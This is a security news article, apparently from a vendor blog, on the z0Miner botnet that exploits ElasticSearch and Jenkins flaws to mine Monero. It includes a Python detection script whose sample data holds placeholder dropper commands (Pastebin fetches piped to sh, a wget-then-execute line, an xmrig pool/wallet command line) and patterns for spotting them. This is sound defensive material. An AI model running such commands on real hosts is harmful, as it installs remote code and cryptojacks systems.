z0Miner Spreads Using ElasticSearch and Jenkins RCE Vulnerabilities
The cryptomining botnet is seeking to take control of Jenkins and ElasticSearch servers and mine for Monero cryptocurrency.
In recent months, stimulated by the surge in Bitcoin and Monero, various crypto mining families have become active. Based on statistics published by 360 Netlab researchers, most of them are established families that have been around for some time, while others, like z0Miner, are new mining Trojan groups.
On November 2nd, 2020, Tencent Host Security captured z0Miner exploiting WebLogic’s unauthenticated remote command execution vulnerabilities (CVE-2020-14882 and CVE-2020-14883). The group scanned cloud servers in batches to find vulnerable hosts and sent carefully constructed requests to compromise them and execute arbitrary code on the target server.
However, researchers at 360 Netlab observed that the operators have recently upgraded the malware to scan for and attempt to infect new devices by exploiting a remote command execution vulnerability in ElasticSearch (CVE-2015-1427) and an older RCE affecting Jenkins servers. The cryptomining botnet is attempting to take control of these servers to mine Monero (XMR) cryptocurrency.
After it compromises the server, the malware downloads a malicious shell script, and starts tracking down and killing previously deployed cryptominers. Afterward, it sets up a new cron entry to periodically grab and execute malicious scripts from Pastebin.
As in its earlier campaigns, z0Miner still periodically downloads and executes malicious scripts hosted on Pastebin through the cron task it sets up. The latest malicious script URL is as follows:
The next stage of the infection flow downloads a mining kit containing an XMRig miner script, a config file and a starter script, then starts mining cryptocurrency in the background.
After killing a batch of competing miners and setting up the cron task, conf.txt downloads the mining kit from the following three URLs and starts the miner:
Cryptomining botnets regularly use several wallets to collect illegally earned cryptocurrency. As you can observe from the stats shared by 360 Netlab, the z0Miner botnet resumed its activity during mid-January after a short break earlier that month.
Following this incident, the 360 Netlab team recommends that ElasticSearch and Jenkins users check their systems and patch them promptly, check for abnormal processes and network connections, and monitor and block unexpected IPs and URLs.
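As an added illustration of the checks 360 Netlab recommends (this is example code written for this article, not a 360 Netlab or Heimdal tool, and not code from z0Miner itself), the following Python scans a user crontab and a process listing for the two behaviours described above: cron entries that fetch scripts from Pastebin or pipe downloads straight into a shell, and XMRig-style miner processes. Every sample crontab line, process entry, host name, paste id and wallet string below is a constructed placeholder rather than a real z0Miner indicator; the paste-site list and the argument patterns are assumptions to tune for your own environment.

```python
"""Added detection example (not from the article or 360 Netlab): scan a user
crontab and a process listing for Pastebin-fetching cron jobs, download-and-run
droppers, and XMRig-style miner processes. All sample data is constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Constructed `crontab -l` output; paste ids and hosts are placeholders.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * (curl -fsSL https://pastebin.com/raw/PLACEHOLDER || wget -qO- https://pastebin.com/raw/PLACEHOLDER) | sh
@reboot /opt/jenkins/start.sh
*/5 * * * * wget -q -O /tmp/conf.txt http://placeholder.invalid/conf.txt && sh /tmp/conf.txt
"""

# Constructed `ps -eo pid,user,args --no-headers` output; pool and wallet are placeholders.
SAMPLE_PROCESSES = """\
    1 root     /sbin/init
  812 elastic  /usr/share/elasticsearch/jdk/bin/java -Xms1g -Xmx1g
 2231 elastic  /tmp/.cache/xmrig -o placeholder-pool.invalid:3333 -u WALLET_PLACEHOLDER --donate-level 1
 2240 jenkins  /usr/bin/java -jar /usr/share/jenkins/jenkins.war
 2301 root     /bin/sh -c curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh
"""

PASTE_HOSTS = ("pastebin.com",)  # assumption: extend with other paste sites you care about
MINER_MARKERS = ("xmrig", "stratum+tcp://", "stratum+ssl://", "--donate-level")
FETCH_RE = re.compile(r"\b(curl|wget)\b[^|;&]*?(https?://\S+)")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:sh|bash|dash|ash)\b")
EXEC_TMP_RE = re.compile(r"\b(?:sh|bash)\s+/(?:tmp|var/tmp|dev/shm)/\S+")
POOL_ARG_RE = re.compile(r"(?:^|\s)-o\s+\S+:\d+\b")   # XMRig-style `-o pool:port`
USER_ARG_RE = re.compile(r"(?:^|\s)-u\s+\S+")         # XMRig-style `-u wallet`


@dataclass(frozen=True)
class Finding:
    source: str   # "cron" or "process"
    reason: str
    line: str


def classify_command(cmd: str) -> Optional[str]:
    """Return why a shell command looks like a script-fetching dropper, or None."""
    urls = [m.group(2).rstrip(")") for m in FETCH_RE.finditer(cmd)]
    for host in (urlparse(u).hostname or "" for u in urls):
        if any(host == p or host.endswith("." + p) for p in PASTE_HOSTS):
            return f"fetches script from paste site {host}"
    if urls and PIPE_TO_SHELL_RE.search(cmd):
        return "downloads remote content and pipes it to a shell"
    if urls and EXEC_TMP_RE.search(cmd):
        return "downloads to a temp path and executes it"
    return None


def classify_process(args: str) -> Optional[str]:
    """Return why a process command line looks like a miner or dropper, or None."""
    low = args.lower()
    for marker in MINER_MARKERS:
        if marker in low:
            return f"miner indicator {marker!r} in command line"
    if POOL_ARG_RE.search(args) and USER_ARG_RE.search(args):
        return "pool/wallet argument pair (-o host:port -u ...) in command line"
    return classify_command(args)


def _cron_command(line: str) -> Optional[str]:
    """Extract the command from a user-crontab line (5 time fields or an @keyword)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
    expected = 2 if line.startswith("@") else 6
    return parts[-1] if len(parts) == expected else None  # env lines such as SHELL=... are skipped


def scan_crontab(text: str) -> List[Finding]:
    findings = []
    for line in text.splitlines():
        cmd = _cron_command(line)
        reason = classify_command(cmd) if cmd else None
        if reason:
            findings.append(Finding("cron", reason, line.strip()))
    return findings


def scan_processes(text: str) -> List[Finding]:
    findings = []
    for line in text.splitlines():
        parts = line.split(None, 2)  # pid, user, args
        if len(parts) == 3:
            reason = classify_process(parts[2])
            if reason:
                findings.append(Finding("process", reason, line.strip()))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB) + scan_processes(SAMPLE_PROCESSES):
        print(f"[{f.source}] {f.reason}: {f.line}")
```

On a real host you would feed `scan_crontab` the output of `crontab -l` for each user (and the system crontab files, which carry an extra user field this parser does not handle) and `scan_processes` the output of `ps -eo pid,user,args --no-headers`; a hit on a Jenkins or ElasticSearch server is a reason to inspect the process, its network connections and the cron entry rather than a verdict on its own.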
In this context, I would advise you to conduct every transaction from a secured endpoint. Our Heimdal™ Threat Prevention product can safeguard your computer and cryptocurrency account against all types of online attacks such as malware, ransomware, cryptojacking, and even cryptominers.